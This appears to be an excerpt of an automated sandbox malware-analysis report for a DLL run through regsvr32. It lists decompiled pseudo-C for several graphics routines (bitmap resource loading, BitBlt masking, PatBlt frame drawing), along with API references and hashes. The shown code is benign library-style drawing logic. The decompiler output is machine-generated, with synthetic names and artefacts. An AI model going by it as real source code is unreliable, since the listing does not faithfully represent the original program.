                                                                                                                • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                                                                                                                • API String ID: 1228543026-3888057576
                                                                                                                • Opcode ID: 78b52f88f7b3ac91f3cc894954dfef21359b3b53205421f08440025b00c23b84
                                                                                                                • Instruction ID: 362deadbe15acc06b87cc667881c5110df2592d32378ddc96c768b07699d1440
                                                                                                                • Opcode Fuzzy Hash: 78b52f88f7b3ac91f3cc894954dfef21359b3b53205421f08440025b00c23b84
                                                                                                                • Instruction Fuzzy Hash: 9741A9345043569FDB21EF60CC84AAE7BE1FF48390F21053AF945AB261E7719890DBA6
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003E25A Relevance: 22.6, APIs: 15, Instructions: 139windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E1003E25A(signed int _a4, signed int _a8, struct HDC__* _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t52;
				void* _t53;
				void* _t56;
				signed int _t63;
				struct HDC__* _t64;
				struct HBITMAP__* _t65;
				struct HDC__* _t69;
				void* _t76;
				struct HDC__* _t79;
				intOrPtr* _t82;
				void* _t91;
				signed int _t92;
				intOrPtr _t100;
				int* _t101;
				int _t102;
				void* _t103;
				BITMAPINFO* _t104;
				void* _t106;

				_t52 = LoadResource(_a4, _a8);
				_v20 = _t52;
				if(_t52 == 0) {
					return _t52;
				}
				_t53 = LockResource(_t52);
				_t76 = _t53;
				_v16 = _t76;
				if(_t76 == 0) {
					L17:
					return _t53;
				}
				_push(_t103);
				_t98 =  *_t76 + 0x40;
				_t53 = E10047026(_t76, _t91,  *_t76 + 0x40, _t103,  *_t76 + 0x40);
				_t104 = _t53;
				if(_t104 == 0) {
					L16:
					goto L17;
				} else {
					E1000A7FB(_t98, _t104, _t106, _t104, _t98, _t76, _t98);
					_t56 = _t104 + _t104->bmiHeader;
					_a8 = _a8 & 0x00000000;
					_v12 = _t56;
					do {
						_t82 = _t56 + _a8 * 4;
						_t100 =  *_t82;
						_t92 = 0;
						_v8 = _t82;
						while(_t100 !=  *((intOrPtr*)(0x1009f454 + _t92 * 8))) {
							_t92 = _t92 + 1;
							if(_t92 < 4) {
								continue;
							}
							goto L12;
						}
						__eflags = _a12;
						if(_a12 == 0) {
							_t101 = 0x1009f458 + _t92 * 8;
							_a4 = GetSysColor( *_t101) & 0x000000ff;
							GetSysColor( *_t101);
							_a4 = _a4 << 8;
							_t63 = GetSysColor( *_t101) >> 0x00000010 & 0x000000ff | _a4;
							__eflags = _t63;
							 *_v8 = _t63;
							_t56 = _v12;
						} else {
							__eflags =  *(0x1009f458 + _t92 * 8) - 0x12;
							if(__eflags != 0) {
								 *_t82 = 0xffffff;
							}
						}
						L12:
						_a8 = _a8 + 1;
					} while (_a8 < 0x10);
					_t102 = _t104->bmiHeader.biWidth;
					_t79 = _t104->bmiHeader.biHeight;
					_a4 = _t102;
					_a8 = _t79;
					_t64 = GetDC(0);
					_a12 = _t64;
					_t65 = CreateCompatibleBitmap(_t64, _t102, _t79);
					_v8 = _t65;
					if(_t65 != 0) {
						_t69 = CreateCompatibleDC(_a12);
						_t102 = SelectObject;
						_t79 = _t69;
						_v12 = SelectObject(_t79, _v8);
						StretchDIBits(_t79, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v16 + 0x28 + (1 << _t104->bmiHeader.biBitCount) * 4, _t104, 0, 0xcc0020);
						SelectObject(_t79, _v12);
						DeleteDC(_t79);
					}
					ReleaseDC(0, _a12);
					_push(_t104);
					E100470E9(_t79, _t102, _t104, 0);
					FreeResource(_v20);
					_t53 = _v8;
					goto L16;
				}
			}





























                                                                                                                0x1003e266
                                                                                                                0x1003e26e
                                                                                                                0x1003e271
                                                                                                                0x1003e3d8
                                                                                                                0x1003e3d8
                                                                                                                0x1003e279
                                                                                                                0x1003e27f
                                                                                                                0x1003e283
                                                                                                                0x1003e286
                                                                                                                0x1003e3d6
                                                                                                                0x00000000
                                                                                                                0x1003e3d6
                                                                                                                0x1003e28c
                                                                                                                0x1003e290
                                                                                                                0x1003e294
                                                                                                                0x1003e299
                                                                                                                0x1003e29e
                                                                                                                0x1003e3d4
                                                                                                                0x00000000
                                                                                                                0x1003e2a4
                                                                                                                0x1003e2a8
                                                                                                                0x1003e2b5
                                                                                                                0x1003e2ba
                                                                                                                0x1003e2be
                                                                                                                0x1003e2c1
                                                                                                                0x1003e2c4
                                                                                                                0x1003e2c7
                                                                                                                0x1003e2c9
                                                                                                                0x1003e2cb
                                                                                                                0x1003e2ce
                                                                                                                0x1003e2d7
                                                                                                                0x1003e2db
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e2dd
                                                                                                                0x1003e2df
                                                                                                                0x1003e2e3
                                                                                                                0x1003e2f7
                                                                                                                0x1003e307
                                                                                                                0x1003e30a
                                                                                                                0x1003e318
                                                                                                                0x1003e327
                                                                                                                0x1003e327
                                                                                                                0x1003e32a
                                                                                                                0x1003e32c
                                                                                                                0x1003e2e5
                                                                                                                0x1003e2e5
                                                                                                                0x1003e2ed
                                                                                                                0x1003e2ef
                                                                                                                0x1003e2ef
                                                                                                                0x1003e2ed
                                                                                                                0x1003e32f
                                                                                                                0x1003e32f
                                                                                                                0x1003e332
                                                                                                                0x1003e338
                                                                                                                0x1003e33b
                                                                                                                0x1003e340
                                                                                                                0x1003e343
                                                                                                                0x1003e346
                                                                                                                0x1003e34f
                                                                                                                0x1003e352
                                                                                                                0x1003e35a
                                                                                                                0x1003e35d
                                                                                                                0x1003e362
                                                                                                                0x1003e36b
                                                                                                                0x1003e371
                                                                                                                0x1003e386
                                                                                                                0x1003e3a3
                                                                                                                0x1003e3ad
                                                                                                                0x1003e3b0
                                                                                                                0x1003e3b0
                                                                                                                0x1003e3bb
                                                                                                                0x1003e3c1
                                                                                                                0x1003e3c2
                                                                                                                0x1003e3cb
                                                                                                                0x1003e3d1
                                                                                                                0x00000000
                                                                                                                0x1003e3d1

                                                                                                                APIs
                                                                                                                • LoadResource.KERNEL32(?,?), ref: 1003E266
                                                                                                                • LockResource.KERNEL32(00000000), ref: 1003E279
                                                                                                                • _malloc.LIBCMT ref: 1003E294
                                                                                                                  • Part of subcall function 10047026: __FF_MSGBANNER.LIBCMT ref: 10047049
                                                                                                                  • Part of subcall function 10047026: __NMSG_WRITE.LIBCMT ref: 10047050
                                                                                                                  • Part of subcall function 10047026: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1005493C,?,00000001,00000001,1004ECAF,00000018,100B5BF0,0000000C,1004ED3E,00000001), ref: 1004709E
                                                                                                                  • Part of subcall function 1000A7FB: _memcpy_s.LIBCMT ref: 1000A80B
                                                                                                                • GetSysColor.USER32 ref: 1003E300
                                                                                                                • GetSysColor.USER32 ref: 1003E30A
                                                                                                                • GetSysColor.USER32 ref: 1003E31C
                                                                                                                • GetDC.USER32(00000000), ref: 1003E346
                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 1003E352
                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 1003E362
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 1003E374
                                                                                                                • StretchDIBits.GDI32(00000000,00000000,00000000,00000008,00000010,00000000,00000000,00000008,00000010,?,00000000,00000000,00CC0020), ref: 1003E3A3
                                                                                                                • SelectObject.GDI32(00000000,00000008), ref: 1003E3AD
                                                                                                                • DeleteDC.GDI32(00000000), ref: 1003E3B0
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 1003E3BB
                                                                                                                • FreeResource.KERNEL32(00000000), ref: 1003E3CB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ColorResource$CompatibleCreateObjectSelect$AllocateBitmapBitsDeleteFreeHeapLoadLockReleaseStretch_malloc_memcpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 2870220007-0
                                                                                                                • Opcode ID: 6d0353da55908fa1d7fa2fca56e87630e8cd8c4d44a627cf339c2c26641931c0
                                                                                                                • Instruction ID: 846dad1bffad77f9de73737dced2376ddc84ebc6593853536fcd04f89a08638a
                                                                                                                • Opcode Fuzzy Hash: 6d0353da55908fa1d7fa2fca56e87630e8cd8c4d44a627cf339c2c26641931c0
                                                                                                                • Instruction Fuzzy Hash: EF416D75900219EFEB01DFA4CC849AE7BB9FF49341F108469F9169B2A1DB31EA10DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000DAF6 Relevance: 21.2, APIs: 14, Instructions: 244windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E1000DAF6(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t144;
				void* _t146;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr _t153;
				intOrPtr _t154;
				void* _t206;

				_t195 = __edi;
				_push(0x6c);
				E1004764D(0x1008e153, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t206 - 0x40)) = 0x1009a2fc;
				 *(_t206 - 0x3c) = 0;
				 *((intOrPtr*)(_t206 - 0x38)) = 0;
				 *((intOrPtr*)(_t206 - 0x34)) = 0;
				 *(_t206 - 4) = 0;
				 *((intOrPtr*)(_t206 - 0x50)) = 0x1009a2fc;
				 *(_t206 - 0x4c) = 0;
				 *((intOrPtr*)(_t206 - 0x48)) = 0;
				 *((intOrPtr*)(_t206 - 0x44)) = 0;
				 *((intOrPtr*)(_t206 - 0x30)) = 0x1009a2fc;
				 *(_t206 - 0x2c) = 0;
				 *((intOrPtr*)(_t206 - 0x28)) = 0;
				 *((intOrPtr*)(_t206 - 0x24)) = 0;
				 *((intOrPtr*)(_t206 - 0x14)) = 0;
				 *((intOrPtr*)(_t206 - 0x18)) = 0x10098d24;
				 *(_t206 - 0x1c) = 0;
				 *((intOrPtr*)(_t206 - 0x20)) = 0x1009831c;
				 *(_t206 - 4) = 4;
				if(E1000CCDC(_t206 - 0x40, __edi, _t206, CreateCompatibleDC(0)) != 0 && E1000CCDC(_t206 - 0x50, __edi, _t206, CreateCompatibleDC(0)) != 0 && E1000CCDC(_t206 - 0x30, _t195, _t206, CreateCompatibleDC(0)) != 0 && GetObjectA( *( *((intOrPtr*)(_t206 + 8)) + 4), 0x18, _t206 - 0x78) != 0) {
					L1000CFF6( *((intOrPtr*)(_t206 + 0xc)));
					if(L1000111D( *((intOrPtr*)(_t206 + 0xc)),  *(_t206 - 0x74),  *(_t206 - 0x70),  *(_t206 - 0x68) & 0x0000ffff,  *(_t206 - 0x66) & 0x0000ffff, 0) != 0) {
						L1000CFA3(_t206 - 0x18, 1, _t206, CreateBitmap(8, 8, 1, 1, 0x1009a504));
						E1000D03E(_t206 - 0x20, _t206 - 0x18);
						L1000CFF6(_t206 - 0x18);
						L1000CFA3(_t206 - 0x18, 1, _t206, CreateBitmap( *(_t206 - 0x74),  *(_t206 - 0x70), 1, 1, 0));
						 *((intOrPtr*)(_t206 + 8)) = E1000D0A1( *(_t206 - 0x3c),  *( *((intOrPtr*)(_t206 + 8)) + 4));
						_t144 = E1000D0A1( *(_t206 - 0x4c),  *((intOrPtr*)(_t206 - 0x14)));
						 *((intOrPtr*)(_t206 - 0x10)) = _t144;
						if( *((intOrPtr*)(_t206 + 8)) != 0 && _t144 != 0) {
							_t146 = E1000BD03(GetPixel( *(_t206 - 0x3c), 0, 0), _t206 - 0x40, _t145);
							E1000BD03(BitBlt( *(_t206 - 0x4c), 0, 0,  *(_t206 - 0x74),  *(_t206 - 0x70),  *(_t206 - 0x3c), 0, 0, 0xcc0020), _t206 - 0x40, 0xffffff);
							E1000BD03(BitBlt( *(_t206 - 0x4c), 0, 0,  *(_t206 - 0x74),  *(_t206 - 0x70),  *(_t206 - 0x3c), 0, 0, 0xee0086), _t206 - 0x40, _t146);
							_t151 =  *((intOrPtr*)(_t206 + 0xc));
							if(_t151 != 0) {
								_t152 =  *((intOrPtr*)(_t151 + 4));
							} else {
								_t152 = 0;
							}
							_t153 = E1000D0A1( *(_t206 - 0x2c), _t152);
							 *((intOrPtr*)(_t206 + 0xc)) = _t153;
							if(_t153 == 0) {
								_t154 = 0;
							} else {
								 *((intOrPtr*)(_t206 + 0x14)) = E1000BD03(E1000BDEA(_t153, _t206 - 0x30,  *((intOrPtr*)(_t206 + 0x10))), _t206 - 0x30,  *((intOrPtr*)(_t206 + 0x14)));
								 *(_t206 - 0x58) =  *(_t206 - 0x74);
								 *(_t206 - 0x54) =  *(_t206 - 0x70);
								 *(_t206 - 0x60) = 0;
								 *((intOrPtr*)(_t206 - 0x5c)) = 0;
								E1000BD03(E1000BDEA(FillRect( *(_t206 - 0x2c), _t206 - 0x60,  *(_t206 - 0x1c)), _t206 - 0x30, _t160), _t206 - 0x30,  *((intOrPtr*)(_t206 + 0x14)));
								BitBlt( *(_t206 - 0x2c), 0, 0,  *(_t206 - 0x74),  *(_t206 - 0x70),  *(_t206 - 0x3c), 0, 0, 0x660046);
								BitBlt( *(_t206 - 0x2c), 0, 0,  *(_t206 - 0x74),  *(_t206 - 0x70),  *(_t206 - 0x4c), 0, 0, 0x8800c6);
								BitBlt( *(_t206 - 0x2c), 0, 0,  *(_t206 - 0x74),  *(_t206 - 0x70),  *(_t206 - 0x3c), 0, 0, 0x660046);
								_t154 =  *((intOrPtr*)( *((intOrPtr*)(_t206 + 0xc)) + 4));
							}
							E1000D0A1( *(_t206 - 0x2c), _t154);
							E1000D0A1( *(_t206 - 0x4c),  *((intOrPtr*)( *((intOrPtr*)(_t206 - 0x10)) + 4)));
							E1000D0A1( *(_t206 - 0x3c),  *( *((intOrPtr*)(_t206 + 8)) + 4));
						}
					}
				}
				 *(_t206 - 4) = 3;
				 *((intOrPtr*)(_t206 - 0x20)) = 0x10098308;
				L1000CFF6(_t206 - 0x20);
				 *(_t206 - 4) = 2;
				 *((intOrPtr*)(_t206 - 0x18)) = 0x10098308;
				L1000CFF6(_t206 - 0x18);
				 *(_t206 - 4) = 1;
				L1000CD56(_t206 - 0x30);
				 *(_t206 - 4) = 0;
				L1000CD56(_t206 - 0x50);
				 *(_t206 - 4) =  *(_t206 - 4) | 0xffffffff;
				return E10047725(L1000CD56(_t206 - 0x40));
			}










                                                                                                                0x1000daf6
                                                                                                                0x1000daf6
                                                                                                                0x1000dafd
                                                                                                                0x1000db09
                                                                                                                0x1000db0c
                                                                                                                0x1000db0f
                                                                                                                0x1000db12
                                                                                                                0x1000db15
                                                                                                                0x1000db18
                                                                                                                0x1000db1b
                                                                                                                0x1000db1e
                                                                                                                0x1000db21
                                                                                                                0x1000db24
                                                                                                                0x1000db27
                                                                                                                0x1000db2a
                                                                                                                0x1000db2d
                                                                                                                0x1000db30
                                                                                                                0x1000db33
                                                                                                                0x1000db3a
                                                                                                                0x1000db3d
                                                                                                                0x1000db4b
                                                                                                                0x1000db5c
                                                                                                                0x1000dba7
                                                                                                                0x1000dbc7
                                                                                                                0x1000dbe7
                                                                                                                0x1000dbf3
                                                                                                                0x1000dbfb
                                                                                                                0x1000dc0f
                                                                                                                0x1000dc25
                                                                                                                0x1000dc2b
                                                                                                                0x1000dc33
                                                                                                                0x1000dc36
                                                                                                                0x1000dc53
                                                                                                                0x1000dc7f
                                                                                                                0x1000dc9f
                                                                                                                0x1000dca4
                                                                                                                0x1000dca9
                                                                                                                0x1000dcaf
                                                                                                                0x1000dcab
                                                                                                                0x1000dcab
                                                                                                                0x1000dcab
                                                                                                                0x1000dcb6
                                                                                                                0x1000dcbd
                                                                                                                0x1000dcc0
                                                                                                                0x1000ddd2
                                                                                                                0x1000dcc6
                                                                                                                0x1000dce1
                                                                                                                0x1000dce7
                                                                                                                0x1000dced
                                                                                                                0x1000dcf7
                                                                                                                0x1000dcfa
                                                                                                                0x1000dd12
                                                                                                                0x1000dd2d
                                                                                                                0x1000dd44
                                                                                                                0x1000dd57
                                                                                                                0x1000dd5c
                                                                                                                0x1000dd5c
                                                                                                                0x1000dd63
                                                                                                                0x1000dd71
                                                                                                                0x1000dd7f
                                                                                                                0x1000dd7f
                                                                                                                0x1000dc36
                                                                                                                0x1000dbc7
                                                                                                                0x1000dd8c
                                                                                                                0x1000dd90
                                                                                                                0x1000dd93
                                                                                                                0x1000dd9b
                                                                                                                0x1000dd9f
                                                                                                                0x1000dda2
                                                                                                                0x1000ddaa
                                                                                                                0x1000ddae
                                                                                                                0x1000ddb6
                                                                                                                0x1000ddb9
                                                                                                                0x1000ddbe
                                                                                                                0x1000ddcf

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1000DAFD
                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 1000DB4F
                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 1000DB63
                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 1000DB77
                                                                                                                • GetObjectA.GDI32(00000004,00000018,?), ref: 1000DB96
                                                                                                                • CreateBitmap.GDI32(00000008,00000008,00000001,00000001,1009A504), ref: 1000DBE1
                                                                                                                  • Part of subcall function 1000D03E: CreatePatternBrush.GDI32(?), ref: 1000D04D
                                                                                                                  • Part of subcall function 1000CFF6: DeleteObject.GDI32(00000000), ref: 1000D005
                                                                                                                • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 1000DC09
                                                                                                                  • Part of subcall function 1000D0A1: SelectObject.GDI32(?,?), ref: 1000D0A9
                                                                                                                • GetPixel.GDI32(?,00000000,00000000), ref: 1000DC49
                                                                                                                  • Part of subcall function 1000BD03: SetBkColor.GDI32(?,?), ref: 1000BD1D
                                                                                                                  • Part of subcall function 1000BD03: SetBkColor.GDI32(?,?), ref: 1000BD2B
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1000DC75
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00EE0086), ref: 1000DC99
                                                                                                                • FillRect.USER32(?,?,?), ref: 1000DCFD
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 1000DD2D
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,008800C6), ref: 1000DD44
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 1000DD57
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create$CompatibleObject$BitmapColor$BrushDeleteFillH_prolog3PatternPixelRectSelect
                                                                                                                • String ID:
                                                                                                                • API String ID: 3108931702-0
                                                                                                                • Opcode ID: d69e9ac2f5f3e8df1549bcf97479c8da18a1381973d928e60a607054227e66a4
                                                                                                                • Instruction ID: 95502b3af191cccb2c1e05c6da46a113522f07a2ea566406e8f46ae750dbc02a
                                                                                                                • Opcode Fuzzy Hash: d69e9ac2f5f3e8df1549bcf97479c8da18a1381973d928e60a607054227e66a4
                                                                                                                • Instruction Fuzzy Hash: 1091D275C0021DAEEF11EFA5CC81DEEBBB9FF08280F10812AF519A6165DB319E11DB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001FE7B Relevance: 19.7, APIs: 13, Instructions: 231windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E1001FE7B(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t135;
				intOrPtr _t194;
				intOrPtr* _t228;
				void* _t230;
				intOrPtr _t233;

				_push(0x38);
				E1004764D(0x1008f4d0, __ebx, __edi, __esi);
				_t228 = __ecx;
				 *((intOrPtr*)(_t230 - 0x30)) = 0;
				 *((intOrPtr*)(_t230 - 0x34)) = 0x1009b784;
				 *(_t230 - 4) = 0;
				 *((intOrPtr*)(_t230 - 0x28)) = 0;
				 *((intOrPtr*)(_t230 - 0x2c)) = 0x1009b784;
				 *((intOrPtr*)(_t230 - 0x20)) = 0;
				 *((intOrPtr*)(_t230 - 0x24)) = 0x1009b784;
				 *(_t230 - 4) = 2;
				L1000EF50(_t230 - 0x2c,  *(_t230 + 8));
				CopyRect(_t230 - 0x44,  *(_t230 + 8));
				InflateRect(_t230 - 0x44,  ~( *(_t230 + 0xc)),  ~( *(_t230 + 0x10)));
				IntersectRect(_t230 - 0x44, _t230 - 0x44,  *(_t230 + 8));
				L1000CFA3(_t230 - 0x24, 0x1009b784, _t230, CreateRectRgnIndirect(_t230 - 0x44));
				L1000CFA3(_t230 - 0x34, 0x1009b784, _t230, CreateRectRgn(0, 0, 0, 0));
				E1001FC40(_t230 - 0x34, _t230 - 0x2c, _t230 - 0x24, 3);
				_t232 =  *((intOrPtr*)(_t230 + 0x20));
				if( *((intOrPtr*)(_t230 + 0x20)) == 0) {
					 *((intOrPtr*)(_t230 + 0x20)) = E1001FDD8(0, 0x1009b784, _t228, _t232);
				}
				_t194 =  *((intOrPtr*)(_t230 + 0x20));
				_t233 = _t194;
				_t234 = _t233 == 0;
				if(_t233 == 0) {
					E1000A069(0, _t194, 0x1009b784, _t228, _t234);
				}
				if( *((intOrPtr*)(_t230 + 0x24)) == 0) {
					 *((intOrPtr*)(_t230 + 0x24)) = _t194;
				}
				 *((intOrPtr*)(_t230 - 0x18)) = 0;
				 *((intOrPtr*)(_t230 - 0x1c)) = 0x1009b784;
				 *((intOrPtr*)(_t230 - 0x10)) = 0;
				 *((intOrPtr*)(_t230 - 0x14)) = 0x1009b784;
				 *(_t230 - 4) = 4;
				if( *(_t230 + 0x14) != 0) {
					L1000CFA3(_t230 - 0x1c, CreateRectRgn, _t230, CreateRectRgn(0, 0, 0, 0));
					E1001FC25(_t230 - 0x2c,  *(_t230 + 0x14));
					CopyRect(_t230 - 0x44,  *(_t230 + 0x14));
					InflateRect(_t230 - 0x44,  ~( *(_t230 + 0x18)),  ~( *(_t230 + 0x1c)));
					IntersectRect(_t230 - 0x44, _t230 - 0x44,  *(_t230 + 0x14));
					E1001FC25(_t230 - 0x24, _t230 - 0x44);
					E1001FC40(_t230 - 0x1c, _t230 - 0x2c, _t230 - 0x24, 3);
					if( *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x24)) + 4))) {
						L1000CFA3(_t230 - 0x14, CreateRectRgn, _t230, CreateRectRgn(0, 0, 0, 0));
						E1001FC40(_t230 - 0x14, _t230 - 0x1c, _t230 - 0x34, 3);
					}
				}
				if( *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x24)) + 4)) &&  *(_t230 + 0x14) != 0) {
					E1000C878(_t228, _t230 - 0x1c);
					 *((intOrPtr*)( *_t228 + 0x50))(_t230 - 0x44);
					 *(_t230 + 0x14) = E1000D13A(_t228,  *((intOrPtr*)(_t230 + 0x24)));
					PatBlt( *(_t228 + 4),  *(_t230 - 0x44),  *(_t230 - 0x40),  *((intOrPtr*)(_t230 - 0x3c)) -  *(_t230 - 0x44),  *((intOrPtr*)(_t230 - 0x38)) -  *(_t230 - 0x40), 0x5a0049);
					E1000D13A(_t228,  *(_t230 + 0x14));
				}
				_t135 = _t230 - 0x14;
				if( *((intOrPtr*)(_t230 - 0x10)) == 0) {
					_t135 = _t230 - 0x34;
				}
				E1000C878(_t228, _t135);
				 *((intOrPtr*)( *_t228 + 0x50))(_t230 - 0x44);
				 *(_t230 + 0x14) = E1000D13A(_t228,  *((intOrPtr*)(_t230 + 0x20)));
				PatBlt( *(_t228 + 4),  *(_t230 - 0x44),  *(_t230 - 0x40),  *((intOrPtr*)(_t230 - 0x3c)) -  *(_t230 - 0x44),  *((intOrPtr*)(_t230 - 0x38)) -  *(_t230 - 0x40), 0x5a0049);
				if( *(_t230 + 0x14) != 0) {
					E1000D13A(_t228,  *(_t230 + 0x14));
				}
				E1000C878(_t228, 0);
				 *(_t230 - 4) = 3;
				 *((intOrPtr*)(_t230 - 0x14)) = 0x10098308;
				L1000CFF6(_t230 - 0x14);
				 *(_t230 - 4) = 2;
				 *((intOrPtr*)(_t230 - 0x1c)) = 0x10098308;
				L1000CFF6(_t230 - 0x1c);
				 *(_t230 - 4) = 1;
				 *((intOrPtr*)(_t230 - 0x24)) = 0x10098308;
				L1000CFF6(_t230 - 0x24);
				 *(_t230 - 4) = 0;
				 *((intOrPtr*)(_t230 - 0x2c)) = 0x10098308;
				L1000CFF6(_t230 - 0x2c);
				 *(_t230 - 4) =  *(_t230 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t230 - 0x34)) = 0x10098308;
				return E10047725(L1000CFF6(_t230 - 0x34));
			}








                                                                                                                0x1001fe7b
                                                                                                                0x1001fe82
                                                                                                                0x1001fe87
                                                                                                                0x1001fe90
                                                                                                                0x1001fe93
                                                                                                                0x1001fe96
                                                                                                                0x1001fe99
                                                                                                                0x1001fe9c
                                                                                                                0x1001fe9f
                                                                                                                0x1001fea2
                                                                                                                0x1001feab
                                                                                                                0x1001feaf
                                                                                                                0x1001febb
                                                                                                                0x1001fed1
                                                                                                                0x1001fedf
                                                                                                                0x1001fef3
                                                                                                                0x1001ff06
                                                                                                                0x1001ff18
                                                                                                                0x1001ff1d
                                                                                                                0x1001ff20
                                                                                                                0x1001ff27
                                                                                                                0x1001ff27
                                                                                                                0x1001ff2a
                                                                                                                0x1001ff2f
                                                                                                                0x1001ff34
                                                                                                                0x1001ff36
                                                                                                                0x1001ff38
                                                                                                                0x1001ff38
                                                                                                                0x1001ff40
                                                                                                                0x1001ff42
                                                                                                                0x1001ff42
                                                                                                                0x1001ff45
                                                                                                                0x1001ff48
                                                                                                                0x1001ff4b
                                                                                                                0x1001ff4e
                                                                                                                0x1001ff54
                                                                                                                0x1001ff58
                                                                                                                0x1001ff6e
                                                                                                                0x1001ff79
                                                                                                                0x1001ff85
                                                                                                                0x1001ff9b
                                                                                                                0x1001ffa9
                                                                                                                0x1001ffb6
                                                                                                                0x1001ffc8
                                                                                                                0x1001ffd9
                                                                                                                0x1001ffe5
                                                                                                                0x1001fff7
                                                                                                                0x1001fff7
                                                                                                                0x1001ffd9
                                                                                                                0x1002000e
                                                                                                                0x1002001b
                                                                                                                0x10020028
                                                                                                                0x1002003b
                                                                                                                0x10020054
                                                                                                                0x1002005b
                                                                                                                0x1002005b
                                                                                                                0x10020063
                                                                                                                0x10020066
                                                                                                                0x10020068
                                                                                                                0x10020068
                                                                                                                0x1002006e
                                                                                                                0x1002007b
                                                                                                                0x1002008e
                                                                                                                0x100200a7
                                                                                                                0x100200ac
                                                                                                                0x100200b3
                                                                                                                0x100200b3
                                                                                                                0x100200bb
